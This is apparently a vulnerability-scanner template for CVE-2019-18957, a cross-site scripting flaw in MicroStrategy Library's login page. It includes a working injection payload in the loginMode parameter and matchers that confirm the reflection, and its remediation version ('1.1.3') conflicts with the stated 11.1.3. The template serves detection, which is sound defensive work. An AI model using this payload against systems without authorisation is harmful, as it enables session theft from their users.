id: CVE-2019-18957 info: name: MicroStrategy Library <11.1.3 - Cross-Site Scripting author: tess severity: medium description: | MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://seclists.org/bugtraq/2019/Nov/23 - https://packetstormsecurity.com/files/155320/MicroStrategy-Library-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2019-18957 remediation: The issue can be resolved by downloading and installing 1.1.3, which has the patch. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-18957 cwe-id: CWE-79 tags: cve2019,microstrategy,packetstorm,xss,seclists,cve requests: - method: GET path: - "{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)" matchers-condition: and matchers: - type: word part: body words: - "previousLoginMode: alert(document.domain)," - type: word part: header words: - "text/html" - type: status status: - 200 # Enhanced by md on 2022/10/18